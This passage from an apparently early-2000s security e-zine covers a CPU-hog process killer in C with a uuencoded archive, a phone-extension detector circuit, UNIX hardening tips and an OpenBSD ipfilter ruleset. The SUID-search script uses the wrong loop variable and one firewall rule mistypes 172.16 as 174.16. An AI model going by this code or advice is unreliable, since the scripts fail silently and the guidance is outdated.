: if ((process_seconds < NICE_TIME) || (pcpu < NICE_PCPU)) {
: continue;
: }
: else {
: /* nice() the process using setpriority() */
: /* note: should probably check via getpriority()
: * but it doesn't really matter.
: * since you don't save a system call either way.
: */
: if (setpriority(PRIO_PROCESS, pid, NICE_VAL) == -1) {
: perror("setpriority - nice failed");
: }
: }
:
: /* check for kill threshold */
: if ((process_seconds < KILL_TIME) || (pcpu < KILL_PCPU)) {
: continue;
: }
: else {
: /* kill the process */
:
: if (kill((pid_t) pid, KILL_SIG) == -1) {
: perror("kill() failed");
: }
: else {
: printf("Process has been killed\\n");
: ...
:
:
: 6) The obvious.
: ---------------
:
: As stated previously, the program should be wary of killing processes that
: have a UID of 0, because they are "root" owned processes which could be
: quite nasty if they were killed. Obviously, another if-condition could
: have been used to determine whether or not the process was below a certain
: UID to make sure all system processes are safe from this program. (e.g.
: those running as "bin", "news"" or whatever). This has been left as an
: exercise to the reader.
:
: Sysloging was achieved quite easily with syslog(), and was a miscellanous
: feature I thought of nearing the end of the program's construction.
:
: Portability is a problem, obviously, since only a system with a /proc
: filesystem could use this program.
:
: The TEST_ONLY option doesn't work, as I was too lazy to put in another
: #ifdef somewhere. :)
:
: There are many possible extensions to this program that wasn't made, such
: as keeping the state of the processes in memory to compare their PCPU
: based on a shorter time interval instead of their lifetime, which
: could have helped in calculating "surges" in CPU usage for logging or
: other reasons. But for reasons #1 and #2, this was not planned.
:
: Another fun extension would be to find out if the process has child
: processes, and kill them if they exceed a user-defined limit. This would
: allow it to kill off forkbombs, etc.
:
: Source
: ------
: The source "process_killer2.c.gz" is attached at the end of this textfile,
: so to output it to a file, use 'uudecode' and 'gzip' like this:
:
: uudecode infosurge-8.txt ; gzip -dc process_killer2.c.gz
:
: where "infosurge-8.txt" is the filename of this text file.
:
: Conclusion
: -----------
:
: "Keep it simple: as simple as possible, but no simpler."
: -- A. Einstein
:
: Whether you actually would use this program in the wild is up to you.
: Considering that I wrote this program in a few hours, you should probably
: take heed and look for bugs.
:
: As for whether or not the system administrator can pass the blame to the
: program for its actions... remains to be seen. :)

begin 664 process_killer2.c.gz
M'XL("`5Q.SH``W!R;V-E<W-?:VEL;&5R,BYC`+U:;7?31A;^[/R*J7O`4G!L
MA[8?&I/V4##@4Y>D<4*7+3T^LC2RU<B25B/%N"W_?9][9S22[$#9LWN6`\\$>
MS=RYK\\]]48;'XD@<BRQ/?:G4XC:*8YD/?*S1\\K,TV^71:ET(QW?%X]%H))8[
M\\3P?1KY<JH"/7LE8>DH&HDP"F8MB+<7+US?BY>5LP,_?1"HJQ+HHLK/A<+O=
M#E9).4CSU5"$:2YB4$I4E*Q$E.#[QBNB-!G0N=<7U]-GDS/Q-BW%QMN)-(EW
MHE02-T1*J#0LMEXN112*'79XJUSB4=J\\GZC,JWTSOD@.F-X68HHP2@+A"1\\R
MBC3D@YH;B;OH:Y2++<2,"CDP^ICJR];>G11)6HA<>D'S8)\\?$[?TE)4*Q81E
MCCVY\\)*`B/"64A4B@.8*(P_VKG)O([P"E_OVPJ<DUD8F!5@NUBT><6CC!9(,
M4B9^NJ%=I,>T+'A?F,9QNL4*T?'30)Z1.89'1\\-C\\64@(;T4T\\73EU>3R>*7
MZ?6K!;2V@-9XSY=1XL<EJ#]111"E@_5W[:4X6NZOY;B*UAJ+91)A[]Y&?RV#
MO7UJIX;%+I-J;RN65>$5AZM;+[IGM8@V\\G`UERHM<W_O2>@G1=Q>"J(<*FRO
MW4,R6B5>?"A`G&KIH=WGK%QEE&W_B'E1AJ'U$"\\NX!/U8^RNS#)_-9G-1'>X
MC)*A6G>9*%GQIK(S&SB1[PMX0V)C8!NI-3L>P@"!PG&=JNB]8)V7,7F'O)/D
MVVFY6M.9'*SX:Z*QX3!GST:XUIY"41V*Q>7%?/J/Q>75].)J>OUV,7_V:O+\\
M9C9]_5*8G6W^#GA[?D$!+;9>PNQYT.'N#TDA(0ASZ#0BH)3X646.4M"A\\R.>
M$N.TWE.-)_#_E4QD[L7`!8\\(+!&,42"]/M"A'1-+B5"@$U"1'+A:NDK;SR\\6
M8&WQ]/73V=M_3A97%_AR>77Q;#*?3^:5:-=K^-$ZC0-QY^61MXRE8I!",&(E
M+J4Z$PZL0OBT3<V2(.`I"1NC!"&8_`ZF"-]T,$MH7J2$#"Z3`MHMKJ<_38A/
MLJ^W24MH"]#D^47IQ8*<40`K<27"(F<KZ6.7SRYO/GJ,GF42$9`4W@K8=F=0
M.BAS1ENB<D%$EZF&&"6;_-/^/A\\PNJ>+$LCMN/J^#.L9=%*PQR56(Z*MYEJ^
M47N-F?]V;_'-TQGRC8`',N:E6ZG(+:(TCXH=9P[#0NU]Y"G_(UO,D4L:IA6.
MMX0:7+YWDU+60;*J,/H5F+,Z^G$ZFVDI&>*74@#!O8)5[B5-(YN814`0D:9^
M$1\\XQZDXH(0`#^\\;NV\\EY1SR>#AC"6]<10A8]GX?]'W)+!(Q'4T-DDH610RK
MI]M$W$5>I;\\PRE4Q:)NJ%N*K$=O@&\\!#4A8:TUJ[C/%H$WX:-R/G\\[/R8/-\\
M^E)\\2UNC!`Z<4`;TH'R'LKIGG`9'3[\\1#K9>3ZY^TBKWCCJ=#O&;#[,T1CYF
MY6C;VQMF%R\\7=`O1!QB3UGB;%IX!NN$LUY/YM;AX/7LK3@Q>ZSQLS,+%1@56
MD+OH,U0!7.EP0`"VPWY`"[L/OEE5'R19NFK!5]77OY'Y,H74)]J=`EEX46S*
M#DMI*>F""O$"KHI0O?0"6EL"@VH6RT9FL%+TV..)AF7A@+DWDZL?+N83D_1#
M!OM[JX*C+V6>PQ9=JI^"*$AZA2FZ;&5BRJZZ-HNKFNN22T1=+AU6@M9G;6G3
M*`6[N#@)HK"52JM<.A5;B@+B)9=:`X%.K"3UO;GUAYL7L\\EK<3IZ_#4K0J4`
MU6>/'A$FW%&Z2!,%NG%T6RD/A_$,P1R1>G/XZ+DX'3?60B]6M#@:'U$50RJD
MY66:QN,VV\\SZ"X,\\2AQ_]`^L0<<I:!><O9TL"A9`P"CH,_$*"MVC/\\EN?Y.C
MCSJHSTJ_T)7`(O.HU%39^*ASU-G(#6YQ'JJL+T:$,W_(-'14YKI@OJ.R@3E3
M8>^YO1O'X6B.?@X:ILR0N<-L\\OV+%],7%WT!ZJXX/Q<GIZ[X$]&<L3,YW<.S
M75S;Z>2R*/-$:Q;?/X`3LT0&&,,G\\."H`TZ2(G2Z$Z)V)E@!S6HGM*HF=Z32
MR+M#H%'Z'KQ+^*KV3<;7<!\\I.?=0+EC)'5J*`?4Q*;U#WX"*Y]#9QGM_#N-W
MV&3+\\=%G601GH4NM@!7,7%VSP`.GUAWQ"/H?V>J];V^M8J5#(&M!`*Q*E"^%
M3GY<]@$0"[GI@X].V:HJ;=N@RS=X(M&J%`W>SL2#@$6F#U!BG[3`"^Z8882=
M@O5$%A]I@X/&[Y00*=1AE3XR60\\`K?LYH#\\2*!<G(5%CK"6AZ?;.DF2W<0#Y
MX5V.VQ<.[7S$%XNA>.P:/R'/$']2%I@#!M)2B9,3.D\\;HTVYJ:L(S>,G[V"I
M-%V2:DD2L:L8-V[[W[SA>7`S0+:XSG?TU21;RGO`P,&@\\CZFR@]/'H]:$6)#
MA)[JO?8Z+DVJ&WY9HT2XI5X6RM-F96^G-):728+K*7GMMM[N^^K6CGP?%<XI
M?_Y`XD%`U`]H1PBB0^?%=(:4$&;LZ-2"1;[@Y[K-^U6#Z&\\XKD^%?7&<$5R$
MT&,(]2E'[^P;O.T+$#-X$1K=D<J+/%OFMPZ@I_LN;^H$<'%,.WKO1KTQ&3,I
MT0>$.]/Y;,DYAR9VJ;GERF3/_N'Y^>N;V4Q;.#3*0T,*Q>(^DC1.'/=,3"Y>
MB#!/-^)6[I:IEP<#S4>MI`^=&H#"<5M;1(/49!YK!5+7G+B\\\\RZ-D)/*(J6$
MYNN]SZ=7XAC]YM@"LVX^Q3%^U(ND>:&6E9HS%$L-U9><$?"3];-=IP*EG;+C
M!"XA'):+Z#@NUTN=RK0@$,8IZ(=$*J&VEN&A,#ZT*#/J-\\8:Z,P:=R#GW(@X
MI%K7>D!6?=)V7]"5^VYB'OF;@*Q7/V6$L6V5KOBHWEW%=2UD*B220*<_/:]2
MR/I)H/IVH4@++V8^48_+#;%%7Q;UD8)[IS&0+TC+)5V!4M6(F2U*?32#`/8#
M;3?/H6QR!5@+:D@S0EN$Z)!H=RO_YH?G@O732G9FOW:N*I:IG++EG*FK=`?'
M5`6409$<I/3`M.=?5)&B?<X`5$CQ$M(EAJ.A-F&7G'UIV?L"D=ABBX^(UHE[
MB"O?2T(GI$A]$(+DPY`VM7P%USM-3W+9MRI!YQJ:;GBKS1TM`D0Q]&,4Q@[#
MQ5%GNP;(H9E#TM=,4Y"<<Y"1YO'/(@8_J=1.&%?Q;Y[3AI/O@D7B;>2OH]_$
M$]$;]5SQUU]B_\\EWHO=MSW6)!KRK0.<CF8I*C"P4B#6R&64_4!"G0<FU-W/X
MZ3,/U;*-\\O4%C,0=RL?`"T#C<J"*!46W+2<^/:C0=_%AFW4IL+3G5`.7YGAE
MH)%QCP=;0A`*);YEO<NSN&XE-UH7PO@8WD;/763B4UTR-AW1'#7NU_:_M@/N
MI;C)U=7%U9E&P)!\\P(0&,)FK;A4%#7``>/I%FN]L?FN+9+*-AF:=B+1PV<YI
MX!6BO9).AZC.4-5C+5O#/>V.W%_GE,-Z;L\\L/SH77S,LJ]LH$UU7S$57.-$`
MO1"*;WC)6BK`--4Y1%IR=M4-+1NM6%-WZ"D33-R$;C*!&*31`+4>D#^G\\4`B
ML(5Z2&Z?B4.:C:1;;5NEPS;C0J_3?1"(YM^N62U%\\V_W_KUV4>\\+NGVL/"2V
MX-8?_^^S-UGL?6C!]S^B9Y!:N^!>?B!D<MI8=8P6$%%R4B$\\U9!8&3<.ZTQ!
M)FYDOY/]W-,Z8;,/M4E:(`2&$6BLQUG4GRO2)OU!"7LZQ+UHH34];3?*2=QI
MM<7XGDWCW'/=<'^O*WCOF1@-(!3KA''%*]+(.8"IOX.VH4G:]T'<?Q/N^_!W
M$*;M=+`?M8:K_<`U081JW+^ULT)HOAKALHHY)^PK^$D]H=.I@0WQI!Y4NA_!
M;5UU&LAM3$<KB-*C!+08MIMT#?K2_K1`1C03/5L,:/9I5+=J':-#-.TN"YK4
M!ZE4>O[!8T$4F>CU!M4F/36L"PA%!817M0D^S<ADQ"^GT!X,]"'FBO-6XUKJ
M8:MDT]=CB&I.VTYH=6M?GT;0)'7+8DS_H8+FEJ5H8O>9EK)3RI:E[%3RLRQE
MKJOM5$M/CQP]=G&UP-4,\\R,"\\P'W4,C&C3:]7>KKJ`P2SKON`_4..0+=&K_-
MBP+=8Z\\]F@&B-C.C8!ZTZ?=/MGYBQO:CH6QQBU*WJB"J&2GSHF>B#JW=S"=7
M?]$'_=(5(?Q_9M`4'<16PS<,UV9&V2B:#0=\\`3Z[X^I%`3H@^+)YF]NR:74T
M:QS-FD?MVXU@[X"&\\?J0_JX/ZAJ][EWV3JJ]DZJJ<EM[D&1:>W068_^LO+WY
MUJ=UA]E0G]_+`A4=/FDZH18!SAXT.3!LE"TRA>%&M-DQ\\WT^J]\\RZ7?S>ZKC
M_"3:.CA(799X\\QV5IO\\)TA3M(#H8A9HLOC;'7P0LG#GJ+L',]#9>E/`DS\\M7
M?E]/-8Z/\\>6.._.ZF[4#U_$]X4,IC(*'SJ%EZ/.CR^ES_8'"R1VS,U>.K7LO
M`+DL:;(DOK`UNAWJI,D)5>=#54(3D#BOQC>MWQ"H2MP&DO`O#J@U@3G_4@)-
M+:T[5QALSGTXJN&H(G&%`_I-@X%KE*5#8'%CD,H15<\\5;/_9'I".JEF9:=M.
MVQ*>#L3DO?1+E+O\\:GOIJ;7&#*83[$WFU+ZHC^OS=IYBY=QZA6]^R4+#44Z3
M:93'I);ZK3$/(>DW+-Q]ZE\\-Q"Q-LWM(Z[I=YZ@V-9-;TE+%NP."/P_$SV54
MM`W7J'%H<*2+&NC`7SL9'*G*6?2VI'?:.]-)@PLW9,=;1V<5/2&K.SW!*332
MQ4,CC1T8Z%2CEC*#T4T:2+N5>VBH-\\X<_OV#OC#_Z8ZZE?+JI*=/F&QG\\ET]
M.>/!E#25#=4?"``!*]$L/M]P:)OKN1)HI4J"!/H]#U%"Q[&1+XR22*UE+2#M
MH%FMKDANB-^1889Y64+3M^-:IX^-3AL#N?%]^[XR^PX&$/><A05C*3/G\\:<N
F_E?O3.A//X/T??F8\\8I`A:"CT88;=8[VSVW\\#A(;.O\\$E````
`
end
:
:....
:
...[ ]........................................................................
: :
: #05 Phone extension warning device - Black_Smurf :
: -------------------------------- :
:.[_]........................................................................:
:
...:
:
: Have you ever been in a situation where you're talking in a private
: conversation.. say to your girlfriend.. and your sister picks up on the
: other phone.. You didn't hear that little 'click'. Things are getting
: pretty hot on the line. You sister hears it all. It gets worse - she
: managed to record it as well. I smell blackmail. This little project
: will detect if more than one phone is picked up on the same line and
: indicate it silently with a LED.
:
: Theory
: ------
:
: With both phones on the hook the phone line voltage is about 50 volts. If a
: phone is picked up this voltage will drop to about 15 volts. The circuit
: detects a drop in voltage in the line and causes a green LED to light if
: any phone is picked up. A voltage divider made up of a 1M, 470K and 100K,
: reverse biases the base of a BC 557 transistor. This keeps the transistor
: switched off, so the LED will not be illuminated. When the line voltage
: falls, the base voltage is pulled lower than 3v (about 2.3v) by the 100K
: resistor, the transistor turns on.
:
: Connected between your phone and the exchange is a series bridge with a
: 220R resistor. When your phone is lifted it puts a voltage across the 220R
: so a 'turn off' voltage is generated on the base of the second. A BC 557
: transistor keeps the red LED off. The red LED indicates if another phone
: is picked up. When this phone is picked up the voltage falls off and the
: red LED lights up. The 220R resistor is used to multiply the voltage drop
: caused by this second phone to about 2v so it can be detected reliably.
:
: Parts
: -----
:
: 2 - 100R 1 - 220R 3 - 100K 2 - 470K 1 - 1M 1 - 1M mini trim pot 8 - 1N 4148
: diodes 2 - BC 557 transistors 1 - greed LED 1 - red LED 2 - AA cells 1 -
: SPDT slide switch (single pole double throw.. Was that a question in the
: electronics exam Phase?) 1 - Phone tee piece 1m - 3 wire ribbon cable 1 -
: Black box if you want 2 - 15 hook-up wires 1 - PC board
:
:
:
: Construction
: ------------
:
: Etch your PC board. If you don't know how to that than grab yourself a
: Dick Smith 'Fun Way' electronics book for kids...
:
: Use the overlay board to identify where the components are to be placed.
: Begin assembly by fitting the resistors first. Next fit the 8 diodes and
: two transistors. The last components to be places are the slide switch
: and mini trim pot. Connect the leads to the tee-piece as show where the
: left side plugs into the wall socket and the right side is where your phone
: plugs into. The labels A B C matches the pins A B C on the circuit diagram.
: Link D and E together with some hookup wire.
:
: =A== =C==
:
: =D== =E==
:
: ==== ==== ==== ====
:
: =B== ====
:
: Before connecting the device to the exchange, turn it on. If both leads
: light up you are on you way to success! Fit the tee piece into your phone
: line. You now need to adjust the trim pot until the red LED turns off.
: Pick up your second phone and the red LED should turn on.
:
: I hope you enjoy constructing and using this project.
:
: Black_Smurf
:
:....
:
...[ ]........................................................................
: :
: #06 UNIX Security - lymco :
: --------------- :
:.[_]........................................................................:
:
...:
:
: This article is a basic text on UNIX Security tips for the newbie.
:
: #! Contents
: 1. Watching your logs
: 2. Firewalling
: 3. Inet Daemons
: 4. System Processes
: 5. Recommended Home Setup
: 6. Extra Ideas
: 7. Links
:
: # Watching your logs
: I was recently invited to a local ISP and talked with some of the
: System Administrators. One thing I found funny was one of the admins
: was IRC'ing (as root), and randomly every 5 minutes switched consoles
: and entered the 'w' command, had a quick read and went back to IRC.
: Sure, this system could of been fine and nothing bad could of been
: happening, but this system was a Redhat 6.1 server, basically default
: install with wu-ftpd. Sad, no?
:
: I found it depressing watching these so called "Certified Admins", sitting
: back, drinking kola beer, talking about how difficult it was to get sound
: working on Linux, etc. Not only did they use the "But no system is secure!"
: line too much, they didn't even monitor any logs what so ever. Whatever you
: do, you must monitor your logs! You don't have to sit there with bulging
: eyes reading every line outputted to the buffer, but for gods sake keep
: an eye on them. Gnome has a nice utility used for monitering logs. It has
: a soothing GUI interface and it basically outputs the data of multiple
: logs to the listbox. It's a very useful application. If you're a console
: user, my favourite method is to setup syslogd to pipe messages depending
: on the logfile and/or logtype.
:
: Basically, keep an eye on:
: 1) /var/log/messages (the main log)
: 2) /var/log/secure which shows logins, SU's, etc.
: 3) /var/log/daemon (for *BSD users)
:
: Now I've seen Jestar mention he monitors his SQL/Apache logs as well. The
: majority of inet daemons output their information to 'messages', but
: have a look through /etc/syslog.conf to see how you'd like certain
: daemons/devices to output their information.
:
: Something else you could try is to literally print important logs
: (error messages in this case; thanks fo fyre)
:
: *.err /dev/lp0
:
: Or, you could throw Error messages to a log file:
:
: *.err /var/log/errors
:
: Check the manpages for more examples (man syslogd.conf), and ask around
: on the net to see

  
what other people do with syslog.conf...
:
: Another thing we would like to keep a look out for is what our users are
: doing. An important program to have handy is ttysnoop. This basically
: replaces the bash shell with the ttysnoop clone, which outputs it's
: information to your TTY. All you do is run the program with the desired
: username you'd like to "snoop".
:
: Also, if you're interested to see what TCP connections your users are
: making, have a look at fyres tcpspy (http://eryf.net/software), it
: basically uses /dev/log to output what user is making TCP connections
: to what host, etc.
:
: Programs like Tripwire and AIDE can be valuable to have running too.
: Since there's such an immense range of programs in this class to choose
: from, checkout http://www.wiretapped.net/ . These programs are
: typically known as host-based Intrusion Detection Systems, and are
: virtually a must for the security conscious admin.
:
: # Firewalling
: Setting up a good firewall is important to dump/ignore DoS attacks, ie:
: malformed packet headers, etc. Not to mention to be able to monitor
: what's coming in and out of your network. There is a variety of
: firewall applications on the net, I personally use ipchains since it's
: easy to setup and there's alot of references for it on the internet.
: However, there are some alternatives.
:
: Checkout http://www.wiretapped.net for firewall applications
: or perhaps http://linuxberg.com as an alternative - it gives you good
: explanations of each program.
:
: In the way of port monitoring applications, Snort and Portsentry are
: two popular choices. Both offer detection & logging options for
: various port scans, probes and the like. (Snort: http://www.snort.org ,
: Portsentry: http://www.psionic.com/abacus/portsentry/)
:
: Setting up IPChains:
: Read phase5's article(s) in infosurge 2. He gives good examples in
: setting up ipchains and also tcpwrappers. His article is
: at http://infosurge.rendrag.net/infosurge-2.txt. technion@wiretapped.net
: has his own firewalling script available online at http://coons.org.
: Also, you may like to check out rc.firewall, located at:
: http://jsmoriss.mvlan.net/linux/rcf.html
:
: # Inet Daemons
: What do you _really_ need to run? Firstly, if you haven't got it, grab
: Nmap. My favourite network security tool. Just do a basic nmap scan on
: your localhost ($ nmap localhost). What services are running? Do you
: need them? Do you know what they are? (Nmap is available from
: http://www.insecure.org/nmap/)
:
: As I mentioned earlier I visited a few ISP's, and one of them was
: incredibly shocking. I was sitting at a rootshell playing around. Anyway,
: I just ssh'd into a shell account and ran a few nmap's on their machines.
: Their main server outputted basically all of the default Redhat services.
: At first I wondered, "Is this just a play around box for the Jnr Admin to
: practice on?". I was wrong - very wrong. It was one of the main servers.
: I showed one of the admins, and he was like: "I like to use linuxconf
: over the network; Printer? We need to print stuff.. sunrpc.. what's that?
: Oh well.". I don't think he even knew that these services even existed.
: My point being if you don't know what a service does, either "man
: service", or look it up on google. More than likely though, you don't
: need the service.
:
: If you chose 'Workstation Install' when you installed your UNIX
: system (eg: Slackware Linux) then more than likely you won't have
: /etc/inetd.conf. This file has your standard inet daemons listed out,
: and whatever isn't commented out is running. By default, telnet, ftp,
: (and a bunch of other services are running.. so if it exists then comment
: them all out before you even get your system running on the net.
:
: Anyway, lets go through the main daemons:
:
: Telnet -- Don't use it.. use SSH. Why? Because telnet trasnfers it's
: everything in clear text - usernames, passswords, the entire session.
: Username and passwords can be trivially intercepted with
: packet sniffers such as sniffit, ethereal, dsniff, etc.
:
: FTP -- Probably the most commonly exploited daemon. As with all
: services listening on ports < 1024, it runs with root privelige at some
: point during the time it is run, and therefore may be vulnerable to
: a remote root exploit depending on which specific version you're
: running. Decide, do you REALLY need this? If yes, I recommend that you
: don't use WuFTPd (which is commonly shipped with SuSe and Redhat).
: OpenBSD's FTPd is quite decent (a linux port of this is available;
: look for ftpd-BSD). Whatever you do make sure you get the most recent
: version and apply any and all vendor/developer-supplied patches.
:
: Webserver -- Do you need it? If yes, get the recent -STABLE version
: of Apache.
:
: SMTP -- Do you need it? If yes, don't use sendmail, remove it, there's
: alternatives, try Postfix. However, I personally disable it since I use
: my ISP's SMTP server.
:
: X11 -- If you'd like to use the X server over a LAN -- go for it. Make
: sure to only allow connections to X11 from local hosts, and not from
: externel hosts.
:
: For everything else, decide for yourself - more than likely you don't
: need it. However, as I stated earlier read up on the purpose of
: each service, what it does, how it works, etc.
:
: # System Processes
: These are your current systems processes running. Run 'ps auwwx'. You
: will see the services started at init bootup (gpm, etc), also the
: programs you may be currently running, such as BitchX, micq, etc. Now
: alot of the system processes which open at boot time run as root. Not
: to mention some of these aren't really required (see above), and may
: cause security problems.
:
: Everything runs as the UID of it's owner (exception: SUID/SGID apps),
: and with system processes this is commonly root.
:
: Try the following bash script:
:
:
#!/bin/sh

for x in 4777 4770 4755 4750 4751 4500 4555 4550 4551
do
find / -perm $i >> suid.txt
done
echo "View suid.txt for a list of services running as root"
echo "If you decide you don't need the file as root, use the following:"
echo "chmod o-x <file>; chgrp wheel <file>"
:
: As I've mentioned in the Inet Daemons section, if you don't know what
: a program does, look it up.
:
: # Recommended Home Setup
: A) Make sure to choose the right operating system for you. I run
: Slackware 7.1. My next favourite Linux distribution is Debian 2.2.
:
: B) Firewall your box. If you're a console user, have a RO TTY designated
: for your messages log to be piped to. If you are an X hippie (like
: me), have a Virtual Desktop with you're log filtering program on it. I
: have Gnomes System Log utility running all the time, and checkup on it
: often. Also, 'man syslogd.conf', and see how you'd like syslogd setup.
:
: C) As I stated earlier, shutdown all of the INET daemons you can. If
: you rarely give SSH access to users, then activate it manually instead
: of having it running all the time. My personal preference is to have SSH
: installed, but have it disabled. If anybody requires access to my system
: I simply enable SSH and setup the TCP wrappers to only accept connections
: from their IP. (Writing a quick bash script to automate this process is
: a nice idea).
:
: SMTP, like I said earlier again, who needs it? You're a home user. Simply
: use a remote SMTP server from your ISP.
:
: Like alot of us, we are interested in Web development. Thus we need an
: httpd running. I use Apache + MySQL + PHP.
:
: So that's it. What does you're average home user required enabled to the
: outside world? Nothing. Unless of course you are a Web developer as I
: mentioned in the above paragraph. In this case you would require httpd
: and SQL running. No big deal.
:
: D) Go through all of those system processes in suid.txt and change the
: permissions and the group of the file.
:
: E) Patch your daemons and system services. Go to securityfocus.com, look
: for patches for the daemons you are running. Also checkout your OS's
: website. (eg. www.redhat.com or www.openbsd.org) for updated kernels, etc.
:
: F) Try running OpenBSD as a gateway machine. George (aphex) has written
: a text on how to setup an OpenBSD gateway in this infosurge issue (8).
:
: # Extra Ideas
:
: A) Conceal what OS you are running: The primary way a cracker will
: initiate to break your systems security is by running some Portscans.
: Usually they will use something like nmap -O xxx.xxx.xxx.xxx. The -O
: being an OS Fingerprint (which bases it's results on characteristics
: of the TCP/IP stack). Knowing what operating system is running on a
: targeted machine is more than likely the most valuable piece of
: information if you are planning to gain access to a system. Mainly
: because he/she can edit an exploits' shellcode depending on the remote
: operating system.
:
: It's possible to detect these Nmap scans using, since, for example,
: they'll often send packets set with odd combinations of TCP flags not
: often seen "in the wild". Depending on how the operating system
: responds, it is more often than not able to make an educated guess
: about what operating system is running. On Windows, BlackICE (a decent
: home firewall) has a feature to detect Nmap Fingerprints. Under Unix,
: Portsentry (mentioned above) and Snort (also mentioned above) readily
: detect most scans.
:
: As I was saying, quite some time ago Rendrag introduced me to a linux
: kernel patch which basically changes the way the OS replies to these TCP
: flags. Damien has this "stealth patch" built into his Linux kernel,
: running underneath Debian 2.2. It mainly blocks TCP RST packets, which
: slows down the scan and makes the ports timeout while waiting to
: receive a response. This way it makes -O particularly unreliable.
:
: The example of this: (Please don't nmap his box)
:
: # nmap -O vorlon.rendrag.net
: Starting nmap V. 2.54BETA7 (www.insecure.org/nmap/ )
:
: /* Lets just skip the open ports */
:
: No OS matches for host (If you know what OS is running on it, see
: http://www.insecure.org/cgi-bin/nmap-submit.cgi).
:
: Dogcow from Wiretapped.net/2600.org.au has these files available at:
: http://the.wiretapped.net/security/operating-systems/stealth-kernel-patches/
:
: Another thing to try is to change the /etc/issue and /etc/issue.net files.
: These files basically have a banner for telnet (and when you initiate
: a new TTY), and by default has the operating system, kernel version,
: etc. So change this, or set it blank -- whatever! I like the program
: linux_logo, which makes a nice banner for your issue files. You can get
: it to show additional information, or no information at all about your
: system details. (Redhat users -- /etc/rc.d/rc.local and uncomment the
: lines which write over these files). Linux_Logo is available at linuxberg
: and also freshmeat.
:
: B) Write shell scripts to help you complete tasks: Writing your own
: scripts can help you do complex tasks quickly. The way I set them
: up is defining aliases to point to shell scripts. For example: alias
: killuser="/home/lymco/bash-files/killuser.sh", would be in my bash init
: file, (.bashrc or whatever you prefer). Not only does this method provide
: you with an automated process, it saves you time++.
:
: C) Subscribe to Mailing Lists A good proportion of my learnings have been
: gathered from mailing lists. They can introduce you to new computer
: aspects which you might of never thought of. You can get questions
: answered, or like me.. lurk in the background and learn from the posts.
:
: I recommend visiting securityfocus.com and/or insecure.org, checkout the
: mailing lists available. May I further note, it might be an idea to read
: through some recent archives of the mailing lists, just to make sure it's
: the right one for you. I'm signed up with several mailing lists, including
: 2600-AU, Bugtraq, Vuln-Dev, IDS, and Linux Kernel Security. All have been
: great, and have kept me "on the ball" with security issues on the internet.
:
: D) Learn from your own computer A good way to update your security is
: to try to crack it locally. That is, log on as a standard user and try
: to crack root. Not only do you update your learning of vulnerabilities,
: but also test your System Admin skills. Once you think it's _secure_
: ask a friend on IRC (one with skillz), to break your systems security. If
: he/she does, ask how they did it, and learn from them.
:
: E) Learn C I have not met a _GOOD_ "hacker" who is not a C guru. By knowing
: C inside out and back to front you understand how computers _really_
: work. You can look at some source code and say, "wait a minute that
: strcpy() function is looking a bit dodgy.", or what have you. Learn C,
: learn Assembly, learn how to code. It will get you a long way.
:
: F) The right Operating System No matter what people say, I still
: believe Redhat can be a secure server if it is in the hands of a good
: Admin. Debian is a good option as well. None the less OpenBSD > *, in
: regards to security. Even if you are a home user, it may be an idea to
: throw OBSD on a cheap box as your gateway.
:
: For a Linux workstation, tryout Debian 2.2 or Slackware 7.1.
:
: # Links
: http://infosurge.rendrag.net
: http://www.wiretapped.net
: http://www.2600.org.au
: http://www.freshmeat.net
: http://www.linuxberg.com
: http://www.securityfocus.com
:
: Hopefully the above information taught you something. It wasn't intended
: to be too full on, by the way. If you have any comments or questions,
: e-mail me at lym@thepentagon.com.
:
: "Over and out!",
:
: -- lymco http://dev.spanner.net
:
:....
:
...[ ]........................................................................
: :
: #07 Example configuration of an OpenBSD firewall - aphex :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: ->> intro
: The rules I use are rather slack, but more secure then 70%+ of the
: hosts out there. All this will work on the default install of openbsd
: 2.6 -> current. But if your machine is rather busy, you really should
: recompile the kernel with 'option NMBCLUSTERS=8192' otherwise you'll get
: errors like 'mb_map full' or the system might just hang. Other then that,
: there is no need to recompile your kernel to get this to work, GENERIC is
: fine. It is mainly designed you users with small home networks or small
: businesses, with dialup users in mind (sorry k, ikari).
:
: ->> ip forwarding
: IP Forwarding needs to be turned on. You can do this using sysctl, by
: typing 'sysctl -w net.inet.ip.forwarding=1' OR you can edit the file
: /etc/sysctl.conf by adding:
:
: net.inet.ip.forwarding=1
:
: ->> ipfilter, ipnat and ipmon ipf (ipfilter)
: ipfilter does just what its name suggests, it is a packet filter. To
: turn it on, simply:
:
: ipf -Fa -f /etc/ipf.rules -E
:
: This will flush the ruleset and enable the service. You should add
: 'ipfilter=YES' to rc.conf, to be started at boot. More on /etc/ipf.rules
: later. ipnat performs NAT. to turn it on:
:
: ipnat -CF -f /etc/ipnat.rules
:
: Which will also flush, and enable the service using the rules in
: /etc/ipnat.rules. Also add 'ipnat=YES' to rc.conf. Again, more on this
: later. And just for debugging preposes enable ipmon with:
:
: ipmon -Ds
:
: ->> /etc/ipf.rules
: The main advantage that ipf has over ipchains is the simplicity of the
: rules. Even if you know nothing about ipf, you can have a look at a
: large ruleset and half-understand it, of course at least half a brain
: is required. Heres an example:
:
: pass out from any to any
: pass in from any to any
:
: Now, not to state the obvious, but this roughly means 'allow any
: connection from any interface out through any other interface'. And
: 'allow in any connection on any interface into the machine'. You see
: this don't you? Well thats all there is to ipf. The rest is just options,
: changed and added lines to this default configuration. Well I lie, there
: really is quite alot of complex options and abit of skill required for
: hardcore configurations. But most of the people reading this don't have
: national security clearance or windows 2002 source code to protect, Yes
: I know you have ohday pron, but that doesn't count. Coming up is a
: decently secure configuration. Its fairly stock and has nothing too
: fancy, but it has some good examples in it:
:
: (Ed Note: "#" is used here as a comment in a configuration file rather
: than a command to be typed at a root prompt, as in other areas of IS 8)
:
# For reference:
# ne3 = ethernet to internal network
# tun0 = ppp interface to internet
# 192.168.0.* = internal network.

# IP filtering rules.
# loopback rules
pass out quick on lo0
pass in quick on lo0

# block tiny fragments
block in log quick proto tcp all with short

# drop source routed packets
block in log quick on tun0 all with opt lsrr
block in log quick on tun0 all with opt ssrr

# dont allow anyone to spoof non-routable addresses
block in quick on tun0 from 0.0.0.0/32 to any
block in quick on tun0 from 127.0.0.0/8 to any
block in quick on tun0 from 192.168.0.0/16 to any
block in quick on tun0 from 172.16.0.0/12 to any
block in quick on tun0 from 10.0.0.0/8 to any
block out quick on tun0 from any to 127.0.0.1/8
block out quick on tun0 from any to 192.168.0.0/16
block out quick on tun0 from any to 174.16.0.0/12
block out quick on tun0 from any to 10.0.0.0/8

# allow certain classes of ICMP
pass in quick on tun0 proto icmp all icmp-type 0
